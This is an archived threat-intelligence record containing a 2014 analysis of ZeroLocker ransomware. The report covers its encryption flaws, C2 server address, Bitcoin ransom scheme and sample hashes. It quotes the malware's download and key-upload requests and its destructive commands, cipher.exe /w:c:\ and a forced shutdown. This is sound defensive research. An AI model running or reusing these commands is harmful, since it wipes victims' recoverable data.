{
	"id": "4d122d22-94a3-4ab3-80af-889d335aa29a",
	"created_at": "2026-04-06T00:11:02.289654Z",
	"updated_at": "2026-04-10T03:20:16.408043Z",
	"deleted_at": null,
	"sha1_hash": "2a5a24abff0b10505b8173988f05e80cb8da8f0f",
	"title": "Introduction to the ZeroLocker ransomware",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 879200,
	"plain_text": "Introduction to the ZeroLocker ransomware\r\nBy Kimberly\r\nArchived: 2026-04-05 20:30:11 UTC\r\nA new ransomware called ZeroLocker has surfaced. The files are encrypted with AES (*) encryption.\r\nCurrently the threat is considered the most destructive ransomware we have seen to date.\r\nZeroLocker does not only target data files; it encrypts ALL files on the hard drive, including executables, with AES encryption unless they are located in certain folders or larger than 20 megabytes.\r\nThe folders exempt from encryption are the ones containing the following keywords: Windows, WINDOWS, Program Files, ZeroLocker and Desktop. Encrypted files will have .encrypted appended to their filename.\r\nZeroLocker performs several outbound connections to 5.199.171.47, a VPS located in Sri Lanka.\r\nWhen the threat has finished encrypting the files, it will run the C:\\WINDOWS\\SYSTEM32\\CIPHER.EXE /W:C:\\ command in order to overwrite all deleted data on the hard drive. Doing so makes it impossible to use recovery tools to restore files.\r\nThe main issue with ZeroLocker resides in the fact that when it uploads the decryption key to the server, the C2 returns a 404 Not Found because the requested page doesn’t exist on the server.\r\nTherefore the key isn’t stored in any database or file for later recovery. The only way to recover the key would be to manually filter through the HTTP access logs, if they still exist.\r\nThis coding mistake on behalf of the developer essentially renders the encrypted computer completely useless, as the victim is unable to retrieve the decryption key even after paying the ransom.\r\nZeroLocker is considered very destructive, especially for companies that have custom software installed under normal paths.\r\nCurrently the infection doesn’t delete the Windows System Restore points, so files can be restored using a program like Shadow Explorer or Windows' built-in Previous Versions. This could change at any stage of course.\r\nPayment is only accepted in Bitcoins. The initial ransom is $300; after 5 days the price will increase to $600 and after 10 days the victim will have to pay $1000.\r\nhttp://stopmalvertising.com/malware-reports/introduction-to-the-zerolocker-ransomware.html\r\nPage 1 of 10\r\nSource: Bleeping Computer\r\nThe first instance of ZeroLocker was discovered on a French forum assisting people with malware removal on August 8, 2014.\r\nZeroLocker\r\nOverview of functions.\r\nThe author didn't use AES encryption but used the RijndaelManaged class from the .NET Framework.\r\nThe random number generator is seeded with Environment.TickCount, a 32-bit signed integer containing the amount of time in milliseconds that has passed since the last time the computer was started. The strength of the password is less than 32 bits.\r\nUpon execution the threat will:\r\n1. Create a folder called C:\\ZeroLocker\r\n2. Perform the following outbound connection and save the binary as C:\\ZeroLocker\\ZERORESCUE.EXE\r\nGET /patriote/sansviolence\r\n3. A corresponding registry entry is created so that ZERORESCUE.EXE runs each time the computer starts.\r\n4. Retrieve the Bitcoin address used to pay the ransom and save it as C:\\ZeroLocker\\ADDRESS.DAT\r\nGET /zConfig/171386\r\n1CkwfDadjXPhp3XrUU5J8hQhUtbecH7t1N\r\n5. Upload the decryption key to the server. The request returns a 404.\r\nGET /zImprimer/[ID based upon MAC-ADDRESS]-[PASSWORD]-[BITCOIN ADDRESS]\r\n6. Encrypt the files on the hard drive. For each encrypted file the original file is deleted.\r\n7. Perform the following outbound connection and save the response as C:\\ZeroLocker\\LOG.DAT\r\nGET /enc/1\r\n8. Launch an instance of C:\\WINDOWS\\SYSTEM32\\CIPHER.EXE with the following command line parameters:\r\ncipher.exe\" /w:c:\\\r\n9. Reboot the compromised computer using the following command:\r\nc:\\windows\\system32\\shutdown.exe\" /r /t 0 /f\r\n10. Upon reboot the ransom notice is displayed via C:\\ZeroLocker\\ZERORESCUE.EXE. Clicking the \"Decrypt Files\" button opens an internet connection to the VPS. Unfortunately the request returns a 404, rendering decryption impossible even after paying the ransom. A message informs the victim that the payment hasn’t been received or processed yet and to try again later, as it takes up to 24h to activate the key.\r\nGET /[ID based upon MAC-ADDRESS]/key\r\nGlobal overview.\r\nID based upon MAC-ADDRESS.\r\nSamples Analysed\r\nAt the time of the analysis on August 18, 2014 we were aware of the following MD5 hashes:\r\nbd0a3c308a6d3372817a474b7c653097: TimeDateStamp: Tue Aug 05 14:27:06 2014\r\n3772a3deeb781803a907ed36ee10681d: TimeDateStamp: Wed Aug 06 11:01:48 2014\r\nBoth samples contain the following compile leftovers:\r\nc:\\users\\george\\desktop\\projects\\zerolocker\\testing stuff\\testing stuff\\obj\\debug\\task manager.pdb\r\nThe actor behind ZeroLocker is also associated with several Bitcoin miners.\r\nIf our research has helped you, please consider making a donation through PayPal.\r\nSource: http://stopmalvertising.com/malware-reports/introduction-to-the-zerolocker-ransomware.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"http://stopmalvertising.com/malware-reports/introduction-to-the-zerolocker-ransomware.html"
	],
	"report_names": [
		"introduction-to-the-zerolocker-ransomware.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434262,
	"ts_updated_at": 1775791216,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/2a5a24abff0b10505b8173988f05e80cb8da8f0f.pdf",
		"text": "https://archive.orkl.eu/2a5a24abff0b10505b8173988f05e80cb8da8f0f.txt",
		"img": "https://archive.orkl.eu/2a5a24abff0b10505b8173988f05e80cb8da8f0f.jpg"
	}
}